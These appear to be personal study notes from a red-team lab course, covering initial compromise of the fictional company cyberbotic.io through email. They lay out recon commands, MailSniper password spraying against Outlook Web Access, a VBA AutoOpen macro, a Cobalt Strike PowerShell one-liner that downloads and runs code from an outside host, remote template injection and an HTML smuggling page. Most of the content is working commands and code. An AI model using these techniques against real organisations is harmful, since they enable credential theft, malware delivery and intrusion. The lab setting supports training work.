1_Initial_Compromise_through_Email

• target: cyberbotic, cyberbotic.io
• optional for the lab (also lab VM is not internet connected)

recon

dig cyberbotic.io whois ip dnscan.py -d cyberbotic.com -w subdomains-100.txt spoofy.py -d cyberbotic.io -o stdout

• google dorking
• hunter.io

initial compromise

password spraying

MonthYear
SeasonYear
DayDate

use namemash.py to generate better lists

mailsniper / sprayingtoolkit

PS> import c:\tools\mailsnioper\mailsniper.ps1
PS> Invoke-DomainHarvestOWA -ExchHostname mail.cyberbotic.io
# check for existing emails
PS> Invoke-UsernameHarvestOWA -ExchHostname mail.cyberbotic.io -Domain cyberbotic.io -Userlist possible.txt -OutFile valid.txt

then use MailSniper to Spray

PS> Invoke-PasswordSprayOWA -ExchHostname mail.cyberbotic.io -UserList valid.txt -Password Summer2022

get the global address list

PS> Get-GlobalAddressList -ExchHostname mail.cyberbotic.io -Username cyberbotic\iyates -Password Summer2022 -OutFile gal.txt

sending internal phishing mails

mark of the web

• mails that are sent from the web have this extended attribute
• internally send mails don’t have this mark

PS> gc .-test.txt -Stream Zone.Identifier

word documents with macros

view > macros > create

Macros in: “Document 1”, give it a name and click create “AutoOpen”

Sub AutoOpen()
 
  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
  Shell.Run "notepad"
 
End Sub

cobalt strike:

• attacks > scripted web delivery (s) → 64bit powershell payload for the http listener
• after clicking “launch” cobaltstrike will output a powershell oneline to connect to this

Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/a'))"""

In Excel:

File > Info > Inspect Document > Inspect Document : Inspect : Remove All next to Property Properties and Personal Information.

File > Save As → c:\payloads, save as .doc (word 97-2003)

Cobalt Strike → Site management → Host File

Use a template from c:\Tools\PhishingTemplates

There’s also remote template injection

• create dot file (save as template)
• create the doxc file
  • open file with 7zip → word → _rels → edit settings.xml.rels and set the Target to the URL

HTML smuggling

hide files from content filters

<html>
    <head>
        <title>HTML Smuggling</title>
    </head>
    <body>
        <p>This is all the user will see...</p>
 
        <script>
        function convertFromBase64(base64) {
            var binary_string = window.atob(base64);
            var len = binary_string.length;
            var bytes = new Uint8Array( len );
            for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
            return bytes.buffer;
        }
 
        var file ='VGhpcyBpcyBhIHNtdWdnbGVkIGZpbGU=';
        var data = convertFromBase64(file);
        var blob = new Blob([data], {type: 'octet/stream'});
        var fileName = 'test.txt';
 
        if(window.navigator.msSaveOrOpenBlob) window.navigator.msSaveBlob(blob,fileName);
        else {
            var a = document.createElement('a');
            document.body.appendChild(a);
            a.style = 'display: none';
            var url = window.URL.createObjectURL(blob);
            a.href = url;
            a.download = fileName;
            a.click();
            window.URL.revokeObjectURL(url);
        }
        </script>
    </body>
</html>

How to calculate file? ubuntu@DESKTOP-3BSK7NO ~> echo -en "This is a smuggled file" | base64